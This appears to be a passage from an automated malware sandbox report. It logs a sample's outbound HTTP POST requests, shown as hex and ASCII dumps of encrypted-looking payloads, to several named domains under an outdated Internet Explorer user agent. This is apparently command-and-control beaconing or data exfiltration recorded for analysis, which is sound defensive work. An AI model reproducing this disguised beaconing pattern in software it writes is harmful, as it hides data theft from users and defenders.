4e 35 38 4d 66 72 54 7a 79 36 36 72 46 4a 35 4f 76 2b 70 53 46 46 68 53 45 45 4a 33 51 49 30 65 35 35 31 4e 78 4a 2f 35 4a 66 2b 33 5a 49 6f 4c 4a 6b 45 41 76 72 43 68 64 48 31 59 70 6e 66 78 78 4f 4a 6a 30 41 53 42 70 72 77 61 44 41 4e 44 33 30 5a 73 57 4c 69 6f 56 39 58 43 6b 45 7a 30 56 58 73 2b 66 77 79 5a 6e 58 4f 52 55 5a 6c 53 51 56 43 2f 71 30 43 71 57 39 45 44 38 46 32 41 4a 51 64 64 6b 6e 62 36 58 45 38 75 4e 32 41 4d 4d 58 6b 32 72 33 6a 38 43 4b 6f 70 58 57 35 58 59 64 70 57 75 55 70 55 55 2f 69 46 6c 72 55 47 78 77 7a 61 78 2b 6f 65 Data Ascii: ugzvZ6jlfgltWZL3a4zJtBsnXnuwWYmiXFt7AUfX0TqnIFirpurMMyq8hvgE4A6SkIsfgAJGOJxUg5SK9nZphYMuM/en/swptuvNLNhGQYAV0U1EPCPHae3tejFA744XDPV/ctsv604wZwZW0pAY6gUvVhmS8L73C3qFSgr7o0rgLWwyqwDrJUHkzQoBZsBD55FhmvJn3ngu4DHutuYjhswY4qJEVJC3E2dGcVL3x1qPvlvydvBiG2q3WzMGzffAgo6m71BzmyqpBBcs2jMm5oZGbOhCM1Qa2gOtrNEg531/6d1ekEq0hPBiw6/i4bq6ELWNaWPzU8DaZDcJ4sY1j1unq2X1LE3R5ANd6Jj0l5L8EYH2lu6dMQKqN58MfrTzy66rFJ5Ov+pSFFhSEEJ3QI0e551NxJ/5Jf+3ZIoLJkEAvrChdH1YpnfxxOJj0ASBprwaDAND30ZsWLioV9XCkEz0VXs+fwyZnXORUZlSQVC/q0CqW9ED8F2AJQddknb6XE8uN2AMMXk2r3j8CKopXW5XYdpWuUpUU/iFlrUGxwzax+oe
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.gpthink.comCache-Control: no-cacheData Raw: 62 43 61 68 6d 41 54 61 62 77 6d 77 45 2f 61 33 48 35 31 65 6b 74 65 48 59 4d 45 38 61 34 2b 56 65 4d 2f 78 49 44 64 67 58 70 47 30 69 46 58 4a 71 71 65 73 55 71 32 77 6d 46 49 4c 47 4c 6d 68 2f 7a 35 4c 4c 6f 34 77 70 45 57 4d 6f 34 55 51 74 59 46 4e 50 77 69 6c 5a 6b 4c 77 36 37 38 76 53 4f 62 47 2b 54 42 4c 43 2f 6a 6d 2b 53 34 69 49 71 4c 57 53 77 6b 50 31 55 4e 45 35 34 61 4d 44 4d 52 57 58 6a 2f 50 39 48 30 4f 39 62 36 7a 55 58 5a 69 46 31 59 4e 53 71 4d 53 51 56 32 6f 55 59 54 36 38 44 79 55 31 52 47 36 50 4f 64 7a 51 47 59 45 5a 66 74 44 74 4c 67 38 42 51 45 78 33 67 75 43 76 71 77 57 78 4d 73 36 70 6b 68 54 69 47 51 6d 4f 78 37 4a 38 43 78 59 39 38 4a 57 32 79 68 74 44 36 44 5a 36 46 65 56 59 63 35 62 64 42 76 45 33 6e 50 53 4b 75 4c 48 37 4b 54 6b 7a 4e 50 58 39 5a 43 44 54 64 69 4b 71 38 71 58 63 70 4c 36 58 32 39 62 64 38 42 45 6a 30 72 42 6a 62 61 45 72 77 2f 50 53 42 76 68 30 4b 36 41 56 4c 47 61 6b 44 73 68 2b 2b 58 47 4d 6b 58 48 62 4a 79 48 54 6f 4f 71 56 75 36 6e 64 42 77 2b 61 53 69 69 6f 4c 7a 49 56 54 49 7a 4a 63 53 33 6b 4e 62 4f 47 4a 5a 41 73 38 7a 69 36 52 61 4b 78 76 39 69 78 56 69 7a 38 6a 31 68 75 35 4e 36 43 67 75 7a 53 6e 66 6a 39 32 4a 61 54 42 6d 52 76 6b 37 52 79 45 30 66 4a 50 56 68 48 54 45 63 4e 55 51 59 32 75 47 4d 7a 78 5a 6f 57 76 42 57 49 79 51 51 37 36 55 37 49 62 73 35 4f 35 35 36 59 34 51 34 72 33 42 79 78 4f 74 46 67 4f 77 71 31 51 64 55 2f 32 47 6e 44 57 74 73 6c 4c 61 6a 59 79 31 59 76 6f 7a 32 56 4b 6b 38 76 48 39 39 39 65 6c 39 62 6b 31 73 6c 59 67 38 76 56 51 74 47 51 5a 30 72 5a 69 59 42 67 5a 4f 2f 6d 4f 69 79 6b 63 31 51 48 52 4b 74 41 32 48 68 44 51 65 42 2f 2b 2b 63 67 52 50 7a 7a 2b 59 33 79 69 45 66 4a 39 32 45 33 49 3d Data Ascii: bCahmATabwmwE/a3H51ekteHYME8a4+VeM/xIDdgXpG0iFXJqqesUq2wmFILGLmh/z5LLo4wpEWMo4UQtYFNPwilZkLw678vSObG+TBLC/jm+S4iIqLWSwkP1UNE54aMDMRWXj/P9H0O9b6zUXZiF1YNSqMSQV2oUYT68DyU1RG6POdzQGYEZftDtLg8BQEx3guCvqwWxMs6pkhTiGQmOx7J8CxY98JW2yhtD6DZ6FeVYc5bdBvE3nPSKuLH7KTkzNPX9ZCDTdiKq8qXcpL6X29bd8BEj0rBjbaErw/PSBvh0K6AVLGakDsh++XGMkXHbJyHToOqVu6ndBw+aSiioLzIVTIzJcS3kNbOGJZAs8zi6RaKxv9ixViz8j1hu5N6CguzSnfj92JaTBmRvk7RyE0fJPVhHTEcNUQY2uGMzxZoWvBWIyQQ76U7Ibs5O556Y4Q4r3ByxOtFgOwq1QdU/2GnDWtslLajYy1Yvoz2VKk8vH999el9bk1slYg8vVQtGQZ0rZiYBgZO/mOiykc1QHRKtA2HhDQeB/++cgRPzz+Y3yiEfJ92E3I=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 35 39 35 77 5a 34 2f 68 66 67 6d 67 69 78 61 7a 4c 6d 47 32 54 4a 68 32 61 6c 55 6c 76 54 78 67 4d 37 72 32 4c 46 43 63 2f 56 31 77 46 74 63 55 78 30 4f 4f 70 67 75 67 62 68 5a 4c 44 2f 75 47 67 49 59 62 6e 47 66 51 35 4e 55 63 7a 62 49 75 4f 7a 49 2b 6a 69 77 36 33 4f 53 65 6c 6a 79 50 4b 6e 36 72 42 6e 6d 63 48 54 49 76 5a 6e 47 72 63 4b 78 70 2f 6e 59 7a 51 48 46 7a 4f 2f 67 66 55 58 57 76 44 55 4b 4d 33 53 4c 48 45 37 76 2b 43 5a 42 75 4e 38 4d 50 50 2b 37 31 2f 72 69 72 51 53 48 61 59 57 68 4e 34 44 70 73 49 63 64 72 6f 36 6c 61 48 47 4a 4f 43 79 6d 50 6b 39 45 4d 42 62 46 6d 48 34 44 71 62 44 4d 6e 46 44 33 54 62 52 6e 35 7a 30 6c 35 63 6d 35 38 75 51 31 43 6b 77 64 34 44 63 77 49 66 33 62 4c 47 53 6b 7a 4f 4f 41 79 78 71 56 42 41 50 77 43 75 4a 4f 64 74 4d 50 66 74 79 67 77 68 30 78 75 78 65 34 6b 4d 74 4f 41 65 34 73 79 77 48 46 2b 51 35 33 70 50 67 73 76 67 73 31 50 42 74 6a 2b 6a 52 2b 54 76 64 4e 48 61 68 70 68 58 78 59 54 37 55 72 63 62 32 41 2f 76 62 6f 6f 36 30 72 64 67 4b 66 6c 46 6d 31 4d 4f 61 72 62 6e 6f 31 62 36 47 55 38 4a 43 30 66 78 45 51 35 31 55 62 51 73 47 52 7a 33 6a 37 72 73 53 49 31 56 68 42 6c 7a 4e 32 68 34 51 79 36 50 42 31 75 65 68 44 4e 58 69 45 58 63 31 74 6e 75 34 30 6d 6a 59 69 78 4e 78 6d 72 6a 42 6b 44 39 33 71 63 69 4b 70 2b 63 5a 2f 50 56 2b 6e 49 73 35 43 76 34 77 76 35 50 2f 6d 31 5a 54 52 4b 49 47 39 2b 78 34 45 6c 56 74 62 63 72 6c 50 6f 4b 7a 2f 31 71 41 6e 74 57 76 36 46 53 71 6c 50 55 62 6a 54 41 49 5a 44 2f 78 54 64 65 6f 55 32 64 6e 41 61 4b 67 4c 6d 34 75 2b 42 4e 62 6d 4a 41 57 66 43 39 47 53 58 64 31 46 4c 35 6f 44 6f 78 34 2f 30 4f 75 32 67 32 71 2b 39 52 72 64 77 65 65 76 61 30 35 4c 2f 64 55 6d 79 55 6e 46 68 2f 70 49 32 4d 30 75 6d 63 4b 38 50 48 44 34 44 70 73 35 4b 61 41 50 6b 6d 4a 65 65 2b 41 3d 3d Data Ascii: 595wZ4/hfgmgixazLmG2TJh2alUlvTxgM7r2LFCc/V1wFtcUx0OOpgugbhZLD/uGgIYbnGfQ5NUczbIuOzI+jiw63OSeljyPKn6rBnmcHTIvZnGrcKxp/nYzQHFzO/gfUXWvDUKM3SLHE7v+CZBuN8MPP+71/rirQSHaYWhN4DpsIcdro6laHGJOCymPk9EMBbFmH4DqbDMnFD3TbRn5z0l5cm58uQ1Ckwd4DcwIf3bLGSkzOOAyxqVBAPwCuJOdtMPftygwh0xuxe4kMtOAe4sywHF+Q53pPgsvgs1PBtj+jR+TvdNHahphXxYT7Urcb2A/vboo60rdgKflFm1MOarbno1b6GU8JC0fxEQ51UbQsGRz3j7rsSI1VhBlzN2h4Qy6PB1uehDNXiEXc1tnu40mjYixNxmrjBkD93qciKp+cZ/PV+nIs5Cv4wv5P/m1ZTRKIG9+x4ElVtbcrlPoKz/1qAntWv6FSqlPUbjTAIZD/xTdeoU2dnAaKgLm4u+BNbmJAWfC9GSXd1FL5oDox4/0Ou2g2q+9Rrdweeva05L/dUmyUnFh/pI2M0umcK8PHD4Dps5KaAPkmJee+A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 35 39 35 77 5a 34 2f 68 66 67 6d 67 69 78 61 7a 4c 6d 47 32 54 4a 68 32 61 6c 55 6c 76 54 78 67 4d 37 72 32 4c 46 43 63 2f 56 31 77 46 74 63 55 78 30 4f 4f 70 67 75 67 62 68 5a 4c 44 2f 75 47 67 49 59 62 6e 47 66 51 35 4e 55 63 7a 62 49 75 4f 7a 49 2b 6a 69 77 36 33 4f 53 65 6c 6a 79 50 4b 6e 36 72 42 6e 6d 63 48 54 49 76 5a 6e 47 72 63 4b 78 70 2f 6e 59 7a 51 48 46 7a 4f 2f 67 66 55 58 57 76 44 55 4b 4d 33 53 4c 48 45 37 76 2b 43 5a 42 75 4e 38 4d 50 50 2b 37 31 2f 72 69 72 51 53 48 61 59 57 68 4e 34 44 70 73 49 63 64 72 6f 36 6c 61 48 47 4a 4f 43 79 6d 50 6b 39 45 4d 42 62 46 6d 48 34 44 71 62 44 4d 6e 46 44 33 54 62 52 6e 35 7a 30 6c 35 63 6d 35 38 75 51 31 43 6b 77 64 34 44 63 77 49 66 33 62 4c 47 53 6b 7a 4f 4f 41 79 78 71 56 42 41 50 77 43 75 4a 4f 64 74 4d 50 66 74 79 67 77 68 30 78 75 78 65 34 6b 4d 74 4f 41 65 34 73 79 77 48 46 2b 51 35 33 70 50 67 73 76 67 73 31 50 42 74 6a 2b 6a 52 2b 54 76 64 4e 48 61 68 70 68 58 78 59 54 37 55 72 63 62 32 41 2f 76 62 6f 6f 36 30 72 64 67 4b 66 6c 46 6d 31 4d 4f 61 72 62 6e 6f 31 62 36 47 55 38 4a 43 30 66 78 45 51 35 31 55 62 51 73 47 52 7a 33 6a 37 72 73 53 49 31 56 68 42 6c 7a 4e 32 68 34 51 79 36 50 42 31 75 65 68 44 4e 58 69 45 58 63 31 74 6e 75 34 30 6d 6a 59 69 78 4e 78 6d 72 6a 42 6b 44 39 33 71 63 69 4b 70 2b 63 5a 2f 50 56 2b 6e 49 73 35 43 76 34 77 76 35 50 2f 6d 31 5a 54 52 4b 49 47 39 2b 78 34 45 6c 56 74 62 63 72 6c 50 6f 4b 7a 2f 31 71 41 6e 74 57 76 36 46 53 71 6c 50 55 62 6a 54 41 49 5a 44 2f 78 54 64 65 6f 55 32 64 6e 41 61 4b 67 4c 6d 34 75 2b 42 4e 62 6d 4a 41 57 66 43 39 47 53 58 64 31 46 4c 35 6f 44 6f 78 34 2f 30 4f 75 32 67 32 71 2b 39 52 72 64 77 65 65 76 61 30 35 4c 2f 64 55 6d 79 55 6e 46 68 2f 70 49 32 4d 30 75 6d 63 4b 38 50 48 44 34 44 70 73 35 4b 61 41 50 6b 6d 4a 65 65 2b 41 3d 3d Data Ascii: 595wZ4/hfgmgixazLmG2TJh2alUlvTxgM7r2LFCc/V1wFtcUx0OOpgugbhZLD/uGgIYbnGfQ5NUczbIuOzI+jiw63OSeljyPKn6rBnmcHTIvZnGrcKxp/nYzQHFzO/gfUXWvDUKM3SLHE7v+CZBuN8MPP+71/rirQSHaYWhN4DpsIcdro6laHGJOCymPk9EMBbFmH4DqbDMnFD3TbRn5z0l5cm58uQ1Ckwd4DcwIf3bLGSkzOOAyxqVBAPwCuJOdtMPftygwh0xuxe4kMtOAe4sywHF+Q53pPgsvgs1PBtj+jR+TvdNHahphXxYT7Urcb2A/vboo60rdgKflFm1MOarbno1b6GU8JC0fxEQ51UbQsGRz3j7rsSI1VhBlzN2h4Qy6PB1uehDNXiEXc1tnu40mjYixNxmrjBkD93qciKp+cZ/PV+nIs5Cv4wv5P/m1ZTRKIG9+x4ElVtbcrlPoKz/1qAntWv6FSqlPUbjTAIZD/xTdeoU2dnAaKgLm4u+BNbmJAWfC9GSXd1FL5oDox4/0Ou2g2q+9Rrdweeva05L/dUmyUnFh/pI2M0umcK8PHD4Dps5KaAPkmJee+A==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 36 4a 39 2f 68 63 6f 2b 39 41 6e 54 67 79 73 53 4c 5a 2b 55 4d 49 30 32 54 6f 4a 36 44 67 4d 6c 6e 6f 31 7a 65 6a 52 30 59 34 31 49 37 35 53 42 31 34 38 79 31 4d 6f 41 37 32 4a 66 2f 34 36 38 67 44 47 51 79 42 2b 45 4a 4c 66 66 54 32 46 31 34 48 76 63 31 36 4f 47 56 75 70 2b 61 6b 6d 66 55 44 71 50 7a 7a 6f 35 42 6a 38 35 46 66 69 39 71 66 6c 53 75 55 2f 56 78 46 67 33 33 33 65 73 68 6d 71 5a 38 6b 4e 74 79 75 51 6a 50 76 6b 61 66 64 42 64 30 76 76 45 34 33 52 62 5a 56 76 4b 33 31 75 76 43 57 73 59 43 76 54 50 64 5a 6d 51 56 2f 41 77 4d 6e 77 66 43 64 6e 77 43 4f 55 74 39 74 44 70 47 6f 45 59 36 54 6c 6c 57 54 63 65 4c 2f 72 32 30 5a 69 46 63 70 77 6f 75 61 64 65 78 67 71 76 57 57 33 48 49 62 2f 52 46 69 65 68 44 55 34 47 38 72 35 75 49 58 79 4f 54 4a 37 53 6f 4b 77 4f 68 49 79 6c 6e 47 67 59 64 38 48 50 77 75 43 6a 58 30 4a 4f 68 66 61 6e 7a 77 4d 77 53 6c 57 68 6c 34 65 4d 39 4c 57 4d 6d 32 34 54 63 49 47 51 4f 38 63 70 78 73 34 68 71 61 65 6a 5a 72 61 4e 57 50 36 54 57 38 67 6e 7a 4c 73 32 66 63 38 55 6c 33 4b 75 43 50 62 35 53 66 74 4c 43 2f 54 31 41 4c 2b 2b 56 74 70 36 73 6d 7a 64 75 70 2f 68 43 69 67 64 74 4c 48 4b 73 5a 77 66 66 51 42 75 75 37 4f 43 48 62 75 41 43 54 34 67 2b 6e 66 6b 4f 70 36 35 33 71 78 4e 75 51 71 68 4c 41 6d 72 6a 55 4b 49 6e 30 6c 37 4b 4c 72 6e 75 4c 52 4f 6b 50 4f 42 78 35 56 2b 65 4d 64 5a 6e 58 4e 62 30 2f 76 36 42 61 56 54 49 4a 54 66 35 49 79 31 74 41 42 42 6c 41 66 78 4b 75 64 47 6b 38 63 54 70 36 54 6c 41 34 6c 78 52 62 49 31 4c 43 69 6d 56 76 49 4f 38 73 6b 77 64 53 43 77 53 30 39 6f 55 4e 47 74 4a 4e 7a 52 57 71 4b 62 7a 41 2f 32 52 77 74 43 44 51 79 57 6d 55 4e 61 42 68 68 31 71 74 5a 79 64 7a 59 35 50 39 35 30 4a 51 3d 3d Data Ascii: 6J9/hco+9AnTgysSLZ+UMI02ToJ6DgMlno1zejR0Y41I75SB148y1MoA72Jf/468gDGQyB+EJLffT2F14Hvc16OGVup+akmfUDqPzzo5Bj85Ffi9qflSuU/VxFg333eshmqZ8kNtyuQjPvkafdBd0vvE43RbZVvK31uvCWsYCvTPdZmQV/AwMnwfCdnwCOUt9tDpGoEY6TllWTceL/r20ZiFcpwouadexgqvWW3HIb/RFiehDU4G8r5uIXyOTJ7SoKwOhIylnGgYd8HPwuCjX0JOhfanzwMwSlWhl4eM9LWMm24TcIGQO8cpxs4hqaejZraNWP6TW8gnzLs2fc8Ul3KuCPb5SftLC/T1AL++Vtp6smzdup/hCigdtLHKsZwffQBuu7OCHbuACT4g+nfkOp653qxNuQqhLAmrjUKIn0l7KLrnuLROkPOBx5V+eMdZnXNb0/v6BaVTIJTf5Iy1tABBlAfxKudGk8cTp6TlA4lxRbI1LCimVvIO8skwdSCwS09oUNGtJNzRWqKbzA/2RwtCDQyWmUNaBhh1qtZydzY5P950JQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 50 55 48 70 69 4f 73 4b 37 41 6b 57 45 52 36 61 77 69 4f 34 32 6c 54 51 64 79 69 78 46 35 2b 53 54 79 75 59 73 2f 31 77 48 77 47 64 42 54 54 37 54 38 5a 54 54 2f 58 30 34 37 66 4a 49 53 51 4f 54 4d 71 69 2b 50 34 48 44 5a 70 59 51 33 77 52 74 48 74 55 67 47 4a 63 71 6a 39 30 41 44 71 4a 44 31 55 6d 56 52 50 44 4c 6c 58 5a 52 5a 68 4b 37 53 6f 76 4c 54 4e 6e 77 47 4e 30 67 6a 4f 2b 64 48 72 2f 50 55 4f 79 46 4c 54 6d 2f 79 54 6b 61 68 61 4e 42 2b 4f 59 75 31 52 4e 46 2b 51 4b 77 78 65 51 44 31 50 65 51 2f 37 4c 34 51 31 41 37 33 35 70 51 6c 75 31 42 36 75 34 2b 6d 38 4f 63 7a 79 2b 4a 46 59 65 67 62 77 61 6b 79 66 78 4a 4c 7a 49 67 72 51 65 6c 63 48 55 74 76 42 79 59 6b 62 76 58 32 44 52 55 71 62 65 33 46 32 2f 50 48 6d 42 7a 7a 4d 68 44 72 63 51 2b 69 35 31 56 64 59 42 72 6f 6d 54 52 5a 41 79 67 6a 5a 6b 34 51 39 37 6f 65 4e 4d 2b 48 6e 65 62 72 36 30 30 69 74 2b 50 62 36 47 4b 2b 38 75 30 49 37 59 57 50 4a 75 46 4c 72 35 62 4e 72 5a 6d 4e 58 35 34 58 6e 78 2f 36 6b 59 33 66 4a 47 66 6d 75 45 52 4d 34 42 76 77 38 46 67 35 6f 79 6e 72 76 6d 6c 49 69 72 6f 6b 39 72 47 30 5a 33 4e 6f 2b 39 6a 2f 62 4a 59 63 37 58 73 63 63 57 38 5a 5a 74 37 4a 79 6f 57 47 70 50 54 48 68 79 6b 36 79 53 79 35 75 67 56 6a 68 78 30 48 5a 67 55 33 45 77 39 4b 65 64 68 6d 30 50 62 56 31 46 39 6f 51 44 70 6b 44 6d 4f 6a 4e 65 31 57 74 57 33 49 4e 67 2b 66 74 53 2f 45 51 6c 48 6a 34 6b 79 67 55 62 6e 48 61 59 55 41 56 57 5a 37 4c 65 7a 34 46 6d 5a 7a 4f 48 79 50 51 6d 6e 67 4f 39 37 54 7a 6e 49 31 53 2b 74 69 73 77 4b 52 6a 55 33 61 44 41 30 2b 6e 43 62 68 33 71 79 76 48 69 35 51 35 70 61 57 56 41 65 61 56 5a 2b 4c 39 52 6a 70 46 43 6c 52 55 75 36 4e 68 73 77 4d 6f 3d Data Ascii: PUHpiOsK7AkWER6awiO42lTQdyixF5+STyuYs/1wHwGdBTT7T8ZTT/X047fJISQOTMqi+P4HDZpYQ3wRtHtUgGJcqj90ADqJD1UmVRPDLlXZRZhK7SovLTNnwGN0gjO+dHr/PUOyFLTm/yTkahaNB+OYu1RNF+QKwxeQD1PeQ/7L4Q1A735pQlu1B6u4+m8Oczy+JFYegbwakyfxJLzIgrQelcHUtvByYkbvX2DRUqbe3F2/PHmBzzMhDrcQ+i51VdYBromTRZAygjZk4Q97oeNM+Hnebr600it+Pb6GK+8u0I7YWPJuFLr5bNrZmNX54Xnx/6kY3fJGfmuERM4Bvw8Fg5oynrvmlIirok9rG0Z3No+9j/bJYc7XsccW8ZZt7JyoWGpPTHhyk6ySy5ugVjhx0HZgU3Ew9Kedhm0PbV1F9oQDpkDmOjNe1WtW3INg+ftS/EQlHj4kygUbnHaYUAVWZ7Lez4FmZzOHyPQmngO97TznI1S+tiswKRjU3aDA0+nCbh3qyvHi5Q5paWVAeaVZ+L9RjpFClRUu6NhswMo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 71 39 4b 31 4b 53 33 6b 41 51 6f 4c 41 59 69 4b 4a 48 66 57 78 2b 62 30 5a 34 55 62 37 36 57 4c 73 59 38 31 65 59 6d 41 56 4e 63 41 70 78 38 7a 38 65 48 62 6f 36 70 53 34 4f 2f 63 6a 73 70 4d 68 66 50 4c 30 36 64 6d 6a 66 79 6c 30 78 64 59 74 72 54 44 53 68 73 31 4a 2f 77 69 4c 58 2f 2b 4a 39 55 79 70 61 46 71 6d 47 68 65 57 6b 72 42 49 71 36 67 46 43 49 79 6a 32 42 32 55 31 6a 79 70 63 6b 39 68 52 66 33 6f 4a 77 31 6e 77 74 6d 59 41 55 36 6d 41 38 2f 33 37 73 30 58 67 44 2b 67 51 42 4d 4c 37 43 78 47 6b 35 50 44 33 6e 64 51 70 6c 73 6d 44 46 4d 4a 38 61 2f 4a 47 56 47 78 72 49 61 64 32 72 4e 68 74 4a 49 4e 55 68 53 44 66 2f 76 37 4e 76 31 7a 77 41 67 4e 30 4c 6d 70 4d 43 7a 68 2b 36 67 38 48 78 37 57 5a 61 49 79 68 32 32 56 4a 37 4b 36 68 5a 77 6f 36 37 62 63 2f 69 2f 38 2b 44 6a 38 46 4b 32 41 35 61 43 4a 51 65 77 37 4e 34 6a 59 41 67 41 6e 55 34 76 72 57 51 53 39 44 59 6b 36 62 33 7a 38 5a 38 44 34 48 72 4b 4d 34 6c 52 31 2b 2b 69 7a 41 45 72 42 61 4a 55 34 54 4f 61 49 4b 4d 4a 76 6a 54 48 31 75 51 6e 79 43 67 72 6d 74 4b 45 72 67 47 6d 45 43 2b 47 67 7a 34 6d 35 6f 31 50 4b 52 72 75 72 44 39 31 6a 75 62 6c 4d 59 69 6c 65 6f 4e 47 42 71 62 36 46 4b 77 39 45 30 6c 30 5a 61 62 34 42 52 51 59 48 6d 4d 55 35 78 69 38 4d 35 65 4e 44 2f 42 44 46 45 69 66 46 4a 5a 76 59 6d 57 71 57 71 44 46 35 61 6f 45 6f 44 5a 6d 47 51 4a 71 46 55 32 73 68 43 7a 63 36 43 69 6b 6b 4e 54 67 65 65 6c 51 46 47 6b 39 47 4d 4e 73 39 38 56 7a 77 75 38 2f 2b 6f 71 36 42 7a 56 35 6a 32 61 6c 62 47 74 51 5a 2b 42 65 69 48 33 64 72 74 75 6e 31 30 50 42 4f 79 67 35 58 43 62 72 4d 7a 72 59 47 4c 4a 72 49 5a 6e 59 44 62 35 61 69 6c 4b 49 48 73 4f 6d 6f 4f 30 2f 5a 69 30 6d 59 50 30 45 48 79 41 42 4d 4c 72 47 69 56 49 3d Data Ascii: q9K1KS3kAQoLAYiKJHfWx+b0Z4Ub76WLsY81eYmAVNcApx8z8eHbo6pS4O/cjspMhfPL06dmjfyl0xdYtrTDShs1J/wiLX/+J9UypaFqmGheWkrBIq6gFCIyj2B2U1jypck9hRf3oJw1nwtmYAU6mA8/37s0XgD+gQBML7CxGk5PD3ndQplsmDFMJ8a/JGVGxrIad2rNhtJINUhSDf/v7Nv1zwAgN0LmpMCzh+6g8Hx7WZaIyh22VJ7K6hZwo67bc/i/8+Dj8FK2A5aCJQew7N4jYAgAnU4vrWQS9DYk6b3z8Z8D4HrKM4lR1++izAErBaJU4TOaIKMJvjTH1uQnyCgrmtKErgGmEC+Ggz4m5o1PKRrurD91jublMYileoNGBqb6FKw9E0l0Zab4BRQYHmMU5xi8M5eND/BDFEifFJZvYmWqWqDF5aoEoDZmGQJqFU2shCzc6CikkNTgeelQFGk9GMNs98Vzwu8/+oq6BzV5j2albGtQZ+BeiH3drtun10PBOyg5XCbrMzrYGLJrIZnYDb5ailKIHsOmoO0/Zi0mYP0EHyABMLrGiVI=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 72 71 4a 59 4b 4e 54 59 41 51 70 47 32 51 67 67 72 32 36 66 70 79 64 2f 31 41 5a 4d 47 73 78 33 53 4d 76 67 38 50 45 50 39 69 68 63 44 61 55 4d 2b 53 52 53 2f 54 6e 43 2f 36 79 44 45 35 44 33 57 61 5a 62 4f 49 56 62 72 43 59 34 58 68 54 66 58 41 61 50 33 75 73 31 4a 33 36 52 64 65 64 68 6d 46 6e 33 53 4b 74 74 78 6b 2f 64 75 4b 6b 48 45 74 34 43 44 6f 69 73 47 2f 47 4a 43 30 64 44 45 7a 6e 73 4c 31 63 36 56 6f 2f 4d 45 30 74 70 6e 6d 2b 69 46 39 30 2b 39 65 78 2b 77 6a 64 71 2b 35 66 47 38 57 69 46 57 68 6d 55 6f 47 4b 6b 39 64 36 39 6a 4f 75 47 64 7a 78 64 48 63 39 7a 4d 4b 45 6c 53 69 4d 64 72 6f 70 4c 45 33 6e 68 70 6c 46 39 44 38 70 6a 57 50 4a 4b 4d 31 49 46 30 7a 2f 68 4c 71 36 4e 5a 58 54 69 75 4e 6b 48 4a 4e 68 42 4d 78 54 64 65 4b 31 75 30 63 55 69 74 35 79 61 79 70 37 39 42 62 53 58 4f 6e 54 30 71 6c 36 75 71 32 77 49 6b 76 68 65 74 5a 37 76 2f 48 64 72 70 4d 71 48 43 62 4c 68 43 30 42 4c 46 68 74 55 6b 78 56 36 4e 4c 67 78 61 46 30 52 32 61 79 64 4c 4b 30 62 78 5a 79 32 54 30 30 6f 67 55 69 52 7a 4a 61 41 2b 59 64 68 30 6a 66 70 43 68 73 57 75 63 49 65 30 4f 41 54 74 45 31 58 6b 47 75 64 43 5a 67 5a 61 69 4b 78 64 75 67 49 2b 2b 52 54 33 76 44 53 36 62 2b 75 55 58 53 57 5a 65 4a 55 50 4a 36 69 6e 4a 69 35 30 78 51 37 38 55 42 4a 4e 6d 4a 45 6a 6c 6c 31 31 66 41 55 52 2f 30 7a 66 6c 77 69 49 33 4a 53 62 63 6b 68 2f 50 32 42 57 33 6f 30 6d 6b 2b 48 6e 64 66 4f 62 56 64 30 71 41 39 2f 6f 34 53 72 54 39 53 54 63 35 46 68 41 42 5a 5a 76 4c 2b 62 6e 47 4b 56 44 4e 71 76 63 52 31 42 50 70 4e 54 57 55 43 42 57 52 76 41 54 31 73 4c 47 43 48 74 4b 72 36 69 51 41 6e 74 45 32 30 44 53 7a 63 45 34 51 6d 68 64 4d 77 52 71 36 64 64 74 31 47 38 4b 35 70 36 75 45 44 4b 4d 52 39 2b 6c 63 56 4c 68 78 37 4e 59 6d 75 34 62 51 3d 3d Data Ascii: rqJYKNTYAQpG2Qggr26fpyd/1AZMGsx3SMvg8PEP9ihcDaUM+SRS/TnC/6yDE5D3WaZbOIVbrCY4XhTfXAaP3us1J36RdedhmFn3SKttxk/duKkHEt4CDoisG/GJC0dDEznsL1c6Vo/ME0tpnm+iF90+9ex+wjdq+5fG8WiFWhmUoGKk9d69jOuGdzxdHc9zMKElSiMdropLE3nhplF9D8pjWPJKM1IF0z/hLq6NZXTiuNkHJNhBMxTdeK1u0cUit5yayp79BbSXOnT0ql6uq2wIkvhetZ7v/HdrpMqHCbLhC0BLFhtUkxV6NLgxaF0R2aydLK0bxZy2T00ogUiRzJaA+Ydh0jfpChsWucIe0OATtE1XkGudCZgZaiKxdugI++RT3vDS6b+uUXSWZeJUPJ6inJi50xQ78UBJNmJEjll11fAUR/0zflwiI3JSbckh/P2BW3o0mk+HndfObVd0qA9/o4SrT9STc5FhABZZvL+bnGKVDNqvcR1BPpNTWUCBWRvAT1sLGCHtKr6iQAntE20DSzcE4QmhdMwRq6ddt1G8K5p6uEDKMR9+lcVLhx7NYmu4bQ==
